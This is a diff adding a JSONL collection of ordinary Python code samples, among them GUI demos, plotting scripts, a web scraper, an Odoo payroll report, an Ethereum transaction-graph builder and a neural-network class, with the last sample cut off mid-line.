diff --git "a/2557.jsonl" "b/2557.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2557.jsonl"
@@ -0,0 +1,459 @@
+{"seq_id":"248637880","text":"from tkinter import *\nimport circle\n\nW,H=(600,600)\n\ndef f2hex(x):\n return '{:02X}'.format(int(x*0xff))#0xff=255, '{:02X}' formats the integer as a two-digit hex string\n\ndef string(r,g,b):\n return '#'+f2hex(r)+f2hex(g)+f2hex(b)\n\ndef color(n,i):\n oneSixth,twoSixth,threeSix,fourSix,fiveSix,six=(1.0/6.0,2.0/6.0,3.0/6.0,4.0/6.0,5.0/6.0,6.0)\n ratio=i/n\n if ratio <= oneSixth:\n return string(1.0,ratio*six,0.0)\n elif ratio <=twoSixth:\n return string((twoSixth-ratio)*six,1.0,0.0)\n elif ratio <=threeSix:\n return string(0.0,1.0,(ratio-twoSixth)*six)\n elif ratio <=fourSix:\n return string(0.0,(fourSix-ratio)*six,1.0)\n elif ratio <=fiveSix:\n return string((ratio-fourSix)*six,0.0,1.0)\n else:\n return string(1.0,0.0,(1.0-ratio)*six)\n\ndef display(canvas,points):\n for i in range(len(points)):\n j=(i+1)%len(points)\n canvas.create_line(points[i],points[j],fill=color(len(points),i))\n\n\ndef main():\n root = Tk()\n canvas=Canvas(root,width=W,height=H,bg='black')\n canvas.pack()\n points=circle.circle()\n display(canvas,points)\n root.mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"03/colorRingRGB.py","file_name":"colorRingRGB.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"363780948","text":"\"\"\"Shift encrypt names/strings from text file\nLet string A be the first 6 characters of your last-name\n(if your last-name is less than 6 characters,\nrepeat the last letter until you get a six-character string).\n\n(a) Encrypt string A using ROT3 cipher in the English alphabet.\n(b) Encrypt string A using One-Time-Pad cipher,\nwhere the key is 'SECRET'.\n\"\"\"\n\nfrom string import ascii_lowercase\n\nNAME_LENGTH = 6\nSHIFT_DISTANCE = 3\nINPUT_FILENAME = \"cp3404_names.txt\"\nOUTPUT_FILENAME = \"cp3404_cryptograms.txt\"\n\n\ndef main():\n \"\"\"Get names and encrypt them.\"\"\"\n names = get_names(INPUT_FILENAME)\n name_to_cryptogram = encrypt_names(names)\n save_results(name_to_cryptogram, OUTPUT_FILENAME)\n\n\ndef encrypt_names(names):\n name_to_cryptogram = {}\n for name in names:\n cryptogram = encrypt_name(name, SHIFT_DISTANCE)\n name_to_cryptogram[name] = cryptogram\n return name_to_cryptogram\n\n\ndef get_names(filename):\n \"\"\"Retrieve and process names from text file using minimum length and repeated characters to fill.\"\"\"\n names = []\n with open(filename) as input_file:\n lines = input_file.readlines()\n for line in lines:\n name = line.strip().lower().replace(' ', '').replace('-', '') # ward\n names.append(f\"{name[:6]:{name[-1]}<6}\") # warddd\n return names\n\n\ndef encrypt_name(name, distance):\n \"\"\"Use shift to encrypt one name.\"\"\"\n cryptogram = \"\"\n number_of_letters_in_alphabet = len(ascii_lowercase)\n for letter in name:\n index = ascii_lowercase.index(letter)\n new_index = (index + distance) % number_of_letters_in_alphabet\n cryptogram += ascii_lowercase[new_index]\n return cryptogram\n\n\ndef save_results(name_to_cryptogram, filename):\n with open(filename, 'w') as output_file:\n for name, cryptogram in name_to_cryptogram.items():\n print(f\"{name} => {cryptogram}\", file=output_file)\n\n\nmain()\n","sub_path":"encrypt_solutions.py","file_name":"encrypt_solutions.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"252350158","text":"from bs4 
import BeautifulSoup\nimport pandas\nimport requests\n\ntitle_list = list()\nbroad_list = list()\ntype_list = list()\n\nfor page in range(1,5):\n url = \"http://ch.interest.me/tvn/Program?page=%s&onair=E&code=CAT008&order=\"%page\n temp = requests.get(url)\n temp.encoding = \"utf-8\"\n source_code = temp.text\n soup = BeautifulSoup(source_code, 'lxml')\n \n for link in soup.find_all('span',{'class':'title'}):\n link = link.text\n title_list.append(link)\n broad_list.append(\"tvN\")\n type_list.append(\"drama\")\n\n\n \ndrama_title = pandas.DataFrame({'Broadcaster' : broad_list,'title' : title_list,'type' : type_list})\nf=open(\"C:/Users/jaehyun/Crawling/drama_list/tvN.csv\",\"w\")\nf.write(pandas.DataFrame.to_csv(drama_title))\nf.close()","sub_path":"Web_Crawler/tvn_drama_list_crawler.py","file_name":"tvn_drama_list_crawler.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18350977","text":"# This program is not working!!\n# Ref: [Youtube]('https://youtu.be/Xbl7XjFYsN4?t=748')\n\n\nimport time\nimport threading\nfrom typing import Mapping # Mapping did not work in vscode!!!\n# import typing\nclass Mayhem(threading.Thread):\n def __init__(self, map: Mapping[str, int]) -> None:\n super().__init__()\n self.map = map\n def run(self):\n for key, value in self.map.items():\n print(f'sleep value is {value}')\n time.sleep(value)\n \nd = {\"k1\": 1, \"k2\": 2, \"k3\": 3}\nm = Mayhem(d)\nm.start()\nd['k4'] = 4 # This is expected to throw an error, which it doesn't !!!\nprint(d)","sub_path":"asyncio/Lukasz/01_threading.py","file_name":"01_threading.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267334523","text":"'''\npg 34\n'''\n# Prompt the user for a number with eval(input(\"whatever message you want string\"))\nradius = eval(input(\"Enter a value for radius: \"))\n\n# Compute area\narea = radius * radius * 3.14159\n\n# Display results\nprint(\"The area for the circle of radius\", radius, \"is\", area)","sub_path":"PythonLearn/ch_2/ConsoleInputTest.py","file_name":"ConsoleInputTest.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132342674","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.uic import loadUi\r\nimport sys\r\nfrom databaseinfo.dbconnection import DbConnection as db\r\nclass ModelTable(QFrame):\r\n def __init__(self):\r\n super().__init__()\r\n loadUi(\"Modeltable.ui\", self)\r\n self.con = db.createconnection()\r\n self.cursor = self.con.cursor()\r\n self.fillTable()\r\n def fillTable(self):\r\n strsql = \" select * from modeldetails \"\r\n self.cursor.execute(strsql)\r\n self.dataset=self.cursor.fetchall()\r\n print(self.dataset)\r\n rowcnt = len(self.dataset)\r\n print(rowcnt)\r\n self.tbl.setRowCount(rowcnt)\r\n rownum = 0\r\n for row in self.dataset:\r\n for column in range(len(row)):\r\n print(row[column])\r\n self.tbl.setItem(rownum, column, QTableWidgetItem(str(row[column])))\r\n rownum = rownum + 1\r\ndef main():\r\n app = QApplication(sys.argv)\r\n enq = ModelTable()\r\n enq.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"gui/Modeltable.py","file_name":"Modeltable.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465327921","text":"def 
linear(x, a, k):\n return a*x + k\n\nimport math # type: ignore\nimport numpy as np # type: ignore\nimport matplotlib.pyplot as plt # type: ignore\nimport scipy as scipy\nfrom scipy import optimize\n###############################\nNVE_start = 10000\n\ndt_NVT = (2.5E-15)*1.0E12 # Timestep in NVT in ps\ndt_NVE = (10.0E-15)*1.0E12 # Timestep in NVE in ps\ndata1 = np.loadtxt('Temp_Ar.txt') # NVT Temp\n\ndata2 = np.arange(data1.shape[0])\ndata2 = data2*dt_NVE # Time in NVT\n\n# Plot NVE temperature\nplt.figure(figsize=(15,8))\nplt.plot(data2,data1, 'k')\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\n#plt.axis([0, 100, 86, 100])\nplt.plot([0, 100], [np.mean(data1[NVE_start+1:100000]),np.mean(data1[NVE_start+1:100000])], 'r')\nplt.plot([0, 100], [94.4, 94.4], '--r')\nplt.show()\nprint(np.mean(data1[0:NVE_start]))\nprint(np.mean(data1[NVE_start+1:100000]))\n\n# Plot 100 time step moving average of Temp\n\ntemp_binned = np.zeros(data1.shape[0])\nfor i in range(100,data1.shape[0]):\n temp_binned[i] = np.mean(data1[i-100:i])\n\nplt.figure(figsize=(15,8))\nplt.plot(data2[100:data1.shape[0]-1], temp_binned[100:data1.shape[0]-1])\nprint(np.mean(temp_binned[100:data1.shape[0]-1]))\n#plt.axis([0, 500, 86, 100])\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\nplt.show()\n\ntemp_binned = np.zeros(int(data1.shape[0]/100))\nfor i in range(1,temp_binned.shape[0]):\n temp_binned[i] = np.mean(data1[(i-1)*100+1:(i*100)])\ntemp_binned[0] = temp_binned[1]\nplt.plot(temp_binned)\nprint(np.mean(temp_binned))\n#plt.axis([0, 500, 86, 100])\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\nplt.show()\nprint(temp_binned.shape[0])\nnp.mean(data1[i-100:i])\ndata2 = np.arange(temp_binned.shape[0])\npopt_linear, pcov_linear = scipy.optimize.curve_fit(linear, data2[500:1000],temp_binned[500:1000], p0=[1,0])\nperr_linear = np.sqrt(np.diag(pcov_linear))\nprint(\"slope = %0.2f (+/-) %0.2f\" % (popt_linear[0], perr_linear[0]))\nprint(\"intercept= %0.2f (+/-) %0.2f\" % (popt_linear[1], perr_linear[1]))","sub_path":"test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398728838","text":"import json\nimport os\nimport errno\n\n\ndef read_json_data_file(type,value):\n cwd = os.getcwd()\n pcwd = \"\\\\\".join(cwd.split('\\\\')[:-1])\n confdir = cwd + \"\\\\config\"\n try:\n dirExists = os.path.exists(confdir)\n if not dirExists:\n confdir = pcwd + \"\\\\config\"\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n json_data = open(confdir+\"\\\\config.json\")\n data = json.load(json_data)\n try:\n return data[type][value]\n except:\n return None\n","sub_path":"utils/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"60466052","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api, models, fields\nimport time\nimport datetime\nfrom datetime import date\nfrom datetime import datetime, date, time\nimport logging\n\nclass ReportLibroSalarios(models.AbstractModel):\n _name = 'report.rrhh.libro_salarios'\n\n def _get_contrato(self,id):\n contrato_id = self.env['hr.contract'].search([['employee_id', '=', id]])\n return {'fecha_ingreso':contrato_id.date_start,'fecha_finalizacion': contrato_id.date_end}\n\n def _get_empleado(self,id):\n empleado_id = self.env['hr.employee'].search([['id', '=', id]])\n empleado = 
0\n if empleado_id:\n empleado = empleado_id\n else:\n empleado_id = self.env['hr.employee'].search([['id', '=', id],['active', '=', False]])\n empleado = empleado_id\n return empleado\n\n def _get_nominas(self,id,anio):\n nomina_id = self.env['hr.payslip'].search([['employee_id', '=', id]],order=\"date_from asc\")\n nominas_lista = []\n for nomina in nomina_id:\n nomina_anio = datetime.strptime(nomina.date_from, \"%Y-%m-%d\").year\n if anio == nomina_anio:\n salario = 0\n dias_trabajados = 0\n ordinarias = 0\n extra_ordinarias = 0\n ordinario = 0\n extra_ordinario = 0\n igss = 0\n isr = 0\n anticipos = 0\n bonificacion = 0\n bono = 0\n aguinaldo = 0\n indemnizacion = 0\n septimos_asuetos = 0\n vacaciones = 0\n decreto = 0\n fija = 0\n variable = 0\n otras_deducciones = 0\n for linea in nomina.line_ids:\n if linea.salary_rule_id in nomina.company_id.salario_ids:\n salario += linea.total\n if linea.salary_rule_id in nomina.company_id.ordinarias_ids:\n ordinarias += linea.total\n if linea.salary_rule_id in nomina.company_id.extras_ordinarias_ids:\n extra_ordinarias += linea.total\n if linea.salary_rule_id in nomina.company_id.ordinario_ids:\n ordinario += linea.total\n if linea.salary_rule_id in nomina.company_id.extra_ordinario_ids:\n extra_ordinario += linea.total\n if linea.salary_rule_id in nomina.company_id.igss_ids:\n igss += linea.total\n if linea.salary_rule_id in nomina.company_id.isr_ids:\n isr += linea.total\n otras_deducciones += isr\n if linea.salary_rule_id in nomina.company_id.anticipos_ids:\n anticipos += linea.total\n otras_deducciones += anticipos\n if linea.salary_rule_id in nomina.company_id.bonificacion_ids:\n bonificacion += linea.total\n if linea.salary_rule_id in nomina.company_id.bono_ids:\n bono += linea.total\n if linea.salary_rule_id in nomina.company_id.aguinaldo_ids:\n aguinaldo += linea.total\n if linea.salary_rule_id in nomina.company_id.indemnizacion_ids:\n indemnizacion += linea.total\n if linea.salary_rule_id in nomina.company_id.septimos_asuetos_ids:\n septimos_asuetos += linea.total\n if linea.salary_rule_id in nomina.company_id.vacaciones_ids:\n vacaciones += linea.total\n if linea.salary_rule_id in nomina.company_id.decreto_ids:\n decreto += linea.total\n if linea.salary_rule_id in nomina.company_id.fija_ids:\n fija += linea.total\n if linea.salary_rule_id in nomina.company_id.variable_ids:\n variable += linea.total\n for linea in nomina.worked_days_line_ids:\n dias_trabajados += linea.number_of_days\n total_salario_devengado = ordinarias + extra_ordinarias + ordinario + extra_ordinario + septimos_asuetos + vacaciones\n # total_descuentos = igss + isr + anticipos\n total_deducciones = igss + otras_deducciones\n bono_agui_indem = bono + aguinaldo + indemnizacion\n nominas_lista.append({\n 'orden': nomina.name,\n 'fecha_inicio': nomina.date_from,\n 'fecha_fin': nomina.date_to,\n 'moneda_id': nomina.company_id.currency_id,\n 'salario': salario,\n 'dias_trabajados': dias_trabajados,\n 'ordinarias': ordinarias,\n 'extra_ordinarias': extra_ordinarias,\n 'ordinario': ordinario,\n 'extra_ordinario': extra_ordinario,\n 'septimos_asuetos': septimos_asuetos,\n 'vacaciones': vacaciones,\n 'total_salario_devengado': total_salario_devengado,\n 'igss': igss,\n 'isr': isr,\n 'anticipos': anticipos,\n 'otras_deducciones': otras_deducciones,\n 'total_deducciones': total_deducciones,\n 'bonificacion_id': bonificacion,\n 'decreto': decreto,\n 'fija': fija,\n 'variable': variable,\n 'bono_agui_indem': bono_agui_indem,\n 'liquido_recibir': total_salario_devengado + 
total_deducciones + bonificacion + bono_agui_indem + decreto + fija + variable\n })\n return nominas_lista\n\n @api.model\n def get_report_values(self, docids, data=None):\n data = data if data is not None else {}\n self.model = 'hr.employee'\n docs = data.get('ids', data.get('active_ids'))\n anio = data.get('form', {}).get('anio', False)\n return {\n 'doc_ids': docids,\n 'doc_model': self.model,\n 'docs': docs,\n 'anio': anio,\n '_get_empleado': self._get_empleado,\n '_get_contrato': self._get_contrato,\n '_get_nominas': self._get_nominas,\n }\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"rrhh/report/libro_salarios.py","file_name":"libro_salarios.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"92117132","text":"import os\n\nimport dj_database_url\nimport environ\n\nfrom project.settings import BASE_DIR\n\nenv = environ.Env(DEBUG=(bool, False))\n\n\ndef optenv(var):\n return env(var, default=None)\n\n\nenv.read_env(os.path.join(BASE_DIR, '.env'))\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nDATABASES = {'default': dj_database_url.config(default=env('DATABASE_URL_DEV', default=''))}\n\nDEV_APPS = [\n \"debug_toolbar\"\n]\n\nDEV_MIDDLEWARE = [\n \"debug_toolbar.middleware.DebugToolbarMiddleware\",\n]\n\nINTERNAL_IPS = [\n '127.0.0.1',\n]","sub_path":"project/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320042638","text":"import os\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\ndef plot_many_imgs(imgs, titles=None):\n \n n = len(imgs)\n if n > 80:\n print(f\"Images of len {n} restricted to 80\")\n n = 80\n \n if titles is None:\n titles = list(range(n))\n\n fig, ax = plt.subplots(nrows=n, ncols=1, figsize=(6, n*3))\n\n for _i, (_img, _title) in enumerate(zip(imgs, titles)):\n \n ax[_i].imshow(_img)\n ax[_i].axis('off') \n ax[_i].title.set_text(str(_title))\n \n \ndef load_many_imgs(d, N=10):\n \n sel_fns = np.random.choice(os.listdir(d),size=N).tolist()\n sel_fns = [d / e for e in sel_fns]\n\n imgs = []\n for f in sel_fns:\n imgs.append(np.array(Image.open(f)))\n\n print(f\"loaded {len(imgs)} images\")\n return imgs\n\nclass ScreePlot:\n \n def __init__(self):\n self.values = None\n\n def save(self, learn):\n self.values = pd.DataFrame(learn.recorder.values.copy())\n\n def scree(self, learn):\n \n valid_df = pd.DataFrame(learn.recorder.values)\n test_df = pd.DataFrame(learn.cbs[3].values)\n\n if self.values is not None:\n valid_df = pd.concat((self.values, valid_df))\n valid_df.reset_index()\n\n def foo(cv, ct):\n plt.plot(valid_df.iloc[:,cv], label='valid')\n plt.plot((test_df.iloc[:,ct]),label='test' )\n \n foo(cv=2,ct=1)\n plt.ylim(0,1)\n plt.legend()\n plt.title('acc')\n plt.show()\n \n foo(cv=1,ct=0)\n plt.legend()\n plt.title('loss')\n plt.ylim(0,3)\n plt.show()\n \n","sub_path":"chess-classification-hw/modules/plotutils.py","file_name":"plotutils.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"434716511","text":"import pylab\nimport imageio\nimport numpy as np\nimport matplotlib.pyplot as 
plt\nimport scipy.misc\nimport MPI\nimport workspace_frame_loss\nimport pprint\n\ndef display(frame, frame_n=None):\n fig = pylab.figure()\n if frame_n is not None:\n fig.suptitle('Frame #' + str(frame_n), fontsize=20)\n pylab.imshow(frame, cmap='gray')\n pylab.show()\n\ndef load_video(path):\n return imageio.get_reader(path, 'ffmpeg')\n\ndef dropped_frames(video, proportion):\n # Can't read last frame. Bug?\n for frame_n in range(0, video.get_length() - 100, int(1 / proportion)):\n yield video.get_data(frame_n)\n\ndef get_timecode(frame_n, video):\n fps = video._meta['fps']\n sec = int(frame_n // fps)\n return '{0:02d}:{1:02d}:{2:02d}'.format(\n sec // 3600,\n sec // 60 % 60,\n sec // 1 % 60\n )\n\ndef downsample(frame, proportion):\n return scipy.misc.imresize(frame, size=proportion)\n\n\n# video = load_video('/Users/colinni/Documents/breaking_bad_ozymandias_downsampled.mp4')\n#\n# cuts, MPIs = MPI.get_cuts(dropped_frames(video, proportion=1.0))\n#\n# figure = plt.figure(figsize=(16, 6))\n# plt.plot(MPIs)\n#\n# for frame_n in cuts:\n# plt.axvline(x=frame_n, color='g')\n#\n# timecodes = [get_timecode(frame_n, video) for frame_n in cuts]\n# plt.xticks(cuts, timecodes, size='small', rotation='vertical')\n#\n# # plt.xlim(8000, 12000)\n# plt.subplots_adjust(bottom=0.15, left=0.05, right=0.95, top=0.95)\n# plt.xlabel('Cut timecodes')\n# plt.ylabel('MPI')\n# plt.title('Cuts detected using MPI\\'s')\n# plt.show()\n\nvideo = load_video('/Users/colinni/Documents/breaking_bad_ozymandias_downsampled.mp4')\n\n\nfor frame_n in [11000, 12000, 13000, 1023, 1234, 7543, 4532, 2341]:\n print(\n workspace_frame_loss.workspace_get_loss_brute(\n video.get_data(frame_n),\n video.get_data(frame_n + 1),\n pool_radius=20,\n metric='linear',\n n_colors=3\n )\n )\n print(\n workspace_frame_loss.workspace_get_loss(\n video.get_data(frame_n),\n video.get_data(frame_n + 1),\n pool_radius=20,\n metric='linear',\n n_colors=3\n )\n )\n print()\n# 0 0 465 279 998 15 0 926\n\nstart_frame, end_frame, proportion = 7700, 9500, 0.25\nframe_ns = range(start_frame, end_frame, int(1 / proportion))\n\nframes_a = (video.get_data(frame_n) for frame_n in frame_ns)\nframes_b = (video.get_data(frame_n) for frame_n in frame_ns)\nnext(frames_b)\n\nlosses = []\nfor frame_n, (frame_base, frame_moved) in enumerate(zip(frames_a, frames_b)):\n print(frame_n)\n losses.append(\n workspace_frame_loss.workspace_get_loss_mean_test_alg(\n frame_base,\n frame_moved,\n pool_radius=50,\n\n n_colors=3\n )\n )\n # losses.append(frame_loss.test_base_iteration_speed(frame_base))\n\ndelta_losses = [\n abs(loss_a - loss_b) for loss_a, loss_b in zip(losses[:-1], losses[1:])\n]\n\nfigure = plt.figure(figsize=(16, 6))\nplt.plot(delta_losses)\n\ntimecode_frame_ns = range(start_frame, end_frame, int((end_frame - start_frame) / 32))\ntimecodes = [get_timecode(frame_n, video) for frame_n in timecode_frame_ns]\nplt.xticks(\n [(len(losses) * i / 32) for i in range(32)],\n timecodes,\n size='small',\n rotation='vertical'\n)\n\nplt.subplots_adjust(bottom=0.15, left=0.05, right=0.95, top=0.95)\nplt.xlabel('Frame number')\nplt.ylabel('loss')\nplt.show()\n\n# bench: 72s, pool_radius=50, metric='binary', n_colors=3, frames 7700-7800, prop=1.0\n","sub_path":"workspace_scene_detect.py","file_name":"workspace_scene_detect.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218524353","text":"from web3.auto.infura import w3\nimport json\nimport sys\nimport requests\nimport 
argparse\nfrom requests.exceptions import HTTPError\nimport eth_utils\n\nfrom datetime import datetime\n\nfrom transaction import Transaction\nimport constant\n\nGET_ACCOUNT_NORMAL_TRANSACTION_URL = 'http://api.etherscan.io/api?module=account&action=txlist&address={}&startblock={}&endblock=99999999&sort=asc'\nETHERSCAN_URL = 'http://etherscan.io/address/{}'\n\nWEI = 1000000000000000000\nEXCHANGE_LIST = list(constant.EXCHANGE_ADDRESS_DICT.keys())\nSUSPICIOUS_LIST = list(constant.SUSPICIOUS_ADDRESS_DICT.keys())\n\ntotal_address_set = set()\ntotal_transaction_set = set()\n\ndef get_ether_transaction(account, internal, startBlock, endBlock):\n try:\n response = requests.get(GET_ACCOUNT_NORMAL_TRANSACTION_URL.format(account, startBlock, endBlock))\n response.raise_for_status()\n\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') \n sys.exit(0)\n except Exception as err:\n print(f'Other error occurred: {err}')\n sys.exit(0)\n else:\n json_res = json.loads(response.text)\n res_set = set()\n address_set = set()\n\n if not json_res['result']:\n print(f'{account} has no transactions')\n return res_set\n else:\n\n for transaction in json_res['result']:\n if(not transaction['contractAddress'] and transaction['isError'] == '0' and transaction['input'] == '0x'):\n\n if(transaction['from'] != transaction['to']):\n\n if internal:\n transaction_object = Transaction(transaction['from'], transaction['to'], transaction['value'], \n transaction['gas'], transaction['gasPrice'], transaction['hash'])\n\n if transaction['from'] not in EXCHANGE_LIST:\n address_set.add(transaction['from'])\n if transaction['to'] not in EXCHANGE_LIST:\n address_set.add(transaction['to'])\n if transaction['from'] not in EXCHANGE_LIST and transaction['to'] not in EXCHANGE_LIST:\n res_set.add(transaction_object);\n else:\n if predicate_internal_transaction(transaction['to']) and predicate_internal_transaction(transaction['from']):\n transaction_object = Transaction(transaction['from'], transaction['to'], transaction['value'], \n transaction['gas'], transaction['gasPrice'], transaction['hash'])\n\n if transaction['from'] not in EXCHANGE_LIST:\n address_set.add(transaction['from'])\n if transaction['to'] not in EXCHANGE_LIST:\n address_set.add(transaction['to'])\n if transaction['from'] not in EXCHANGE_LIST and transaction['to'] not in EXCHANGE_LIST:\n res_set.add(transaction_object);\n \n print (f'Get all transactions for {account}')\n return (res_set, address_set)\n\n\ndef predicate_internal_transaction(account):\n return (w3.eth.getCode(w3.toChecksumAddress(account))) == b''\n \n\ndef get_multiple_layers_ether_transaction(account, layer, internal, startBlock = 0 , endBlock = 999999999):\n total_address_set.add(account)\n\n current_transaction_set, current_address_set = get_ether_transaction(account, internal, startBlock, endBlock)\n total_transaction_set.update(current_transaction_set)\n \n # BFS\n for i in range(1, layer):\n current_layer_address_set = current_address_set - total_address_set\n total_address_set.update(current_address_set)\n\n for address in current_layer_address_set:\n temp_transaction_set, temp_address_set = get_ether_transaction(address, internal, startBlock, endBlock)\n current_address_set.update(temp_address_set)\n total_transaction_set.update(temp_transaction_set)\n\n total_address_set.update(current_address_set)\n\n\ndef generate_edgelist(nickname):\n total_address_list = list(total_address_set)\n f1 = open(f\"data/{nickname}.edgelist\",\"w+\")\n\n for transaction in 
total_transaction_set:\n gas_total = int(transaction.value)/WEI + int(transaction.gas)/WEI * int(transaction.gasPrice)/WEI\n f1.write(str(total_address_list.index(transaction.fromAddress)) + '\\t' + str(total_address_list.index(transaction.toAddress)) + '\\t' \n + str(gas_total) + '\\n')\n f1.close\n\n f2 = open(f\"data/{nickname}_address.txt\",\"w+\")\n\n for address in total_address_set:\n if address in EXCHANGE_LIST:\n f2.write(address + \"(\" + constant.EXCHANGE_ADDRESS_DICT[address] + \")\" + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n elif address in SUSPICIOUS_LIST:\n f2.write(address + \"(\" + constant.SUSPICIOUS_ADDRESS_DICT[address] + \")\" + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n else:\n f2.write(address + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n f2.close\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ethereum network graph generater')\n parser.add_argument('address', nargs=1, help='the address that want to investigate')\n parser.add_argument('layer', nargs=1, type=int, help='the number of layer that the address search, 1 layer means just searching neighbours')\n parser.add_argument('-n', '--n', nargs=1, help='the nickname of the address')\n parser.add_argument('-internal', '--internal', action='store_true', help='include internal transaction')\n args = parser.parse_args()\n\n address = args.address[0]\n layer = args.layer[0]\n nickname = \"\"\n internal = False\n\n if not eth_utils.is_hex_address(address):\n print (f'{address} is not a valid address')\n sys.exit(0)\n if not args.n:\n dateTimeObj = datetime.now()\n nickname = dateTimeObj.strftime(\"%d-%m-%Y-%H:%M:%S\")\n if args.internal:\n internal = True\n if args.n:\n nickname = args.n[0]\n \n get_multiple_layers_ether_transaction(eth_utils.to_normalized_address(address), layer, internal)\n generate_edgelist(nickname)\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194035032","text":"import os\nimport datetime\nimport glob\n\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS \n\ndef delete_all_files_in_image():\n \"\"\" \n Deletes all files in image directory \n \"\"\"\n \n [os.remove(file) for file in glob.glob(os.path.join(os.getcwd(),\"src/static/images/\",\"*.png\"))]\n\ndef get_filename(name):\n \"\"\"\n Generated imagename and filename\n Parameters: \n name: Suggested name ( type of plot) to add to image name\n Returns: \n str : imagecname and file name \"\"\"\n \n image_name='{}_{}_plot.png'.format(datetime.datetime.now().strftime(\"%Y-%m-%d\"),name)\n file_name = os.path.join(os.path.sep,os.getcwd(),\"src\",\"static\",\"images\",image_name)\n\n return image_name,file_name\n \n \n\ndef generate_barplot(df,name,xlabel,ylabel,rot_val=0): \n \"\"\"\n Generated bar plot \n Parameters: \n dataframe , name , labels and label rotation\n Returns: \n Saves the plot as image\"\"\"\n\n image_name,file_name=get_filename(name)\n \n plt.figure()\n df.T.plot(kind='bar',rot=rot_val)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.savefig(file_name, format='png')\n plt.close()\n \n\n return image_name\n\ndef generate_histplot(df,name,xlabel,ylabel,col1,col2):\n \"\"\"\n Generated histogram plot \n Parameters: \n dataframe , name , labels and label rotation\n Returns: \n Saves the plot as image\"\"\"\n\n image_name,file_name=get_filename(name)\n plt.figure()\n 
df.plot.bar(x=col1, y=col2)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.savefig(file_name, format='png')\n plt.close()\n\n return image_name\n\n\ndef generate_word_cloud(df,name):\n\n \"\"\"\n Removes stopwords, tokenizes the lyrics and generated a word cloud \n Parameters: \n dataframe , name for the file\n Returns: \n Saves the plot as image\"\"\"\n \n lyrics_words = ' '\n stopwords = set(STOPWORDS) \n \n # iterate through the csv file \n for val in df.LyricsList: \n \n # typecaste each val to string \n val = str(val) \n \n # split the value \n tokens = val.split() \n \n # Converts each token into lowercase \n for i in range(len(tokens)): \n tokens[i] = tokens[i].lower() \n \n for words in tokens: \n lyrics_words = lyrics_words + words + ' '\n \n \n wordcloud = WordCloud(width = 800, height = 800, \n background_color ='white', \n stopwords = stopwords, \n min_font_size = 10).generate(lyrics_words) \n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None) \n plt.imshow(wordcloud) \n plt.axis(\"off\") \n plt.tight_layout(pad = 0) \n \n image_name,file_name=get_filename(name)\n plt.savefig(file_name, format='png')\n f = plt.figure()\n f.clear()\n plt.clf()\n plt.close(f) \n \n \n return image_name","sub_path":"src/helper/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416772985","text":"import math\nimport random as r\n\nclass Neuron:\n\tdef __init__(self, name, numInputs, numOutputs, learnRate):\n\t\tself.name = name\n\t\tself.weights \t\t\t= []\n\t\tself.bias \t\t\t= r.random()\n\t\t#self.bias \t\t= 0.5\n\t\tself.learnRate \t\t= learnRate\n\t\tself.newWeights = 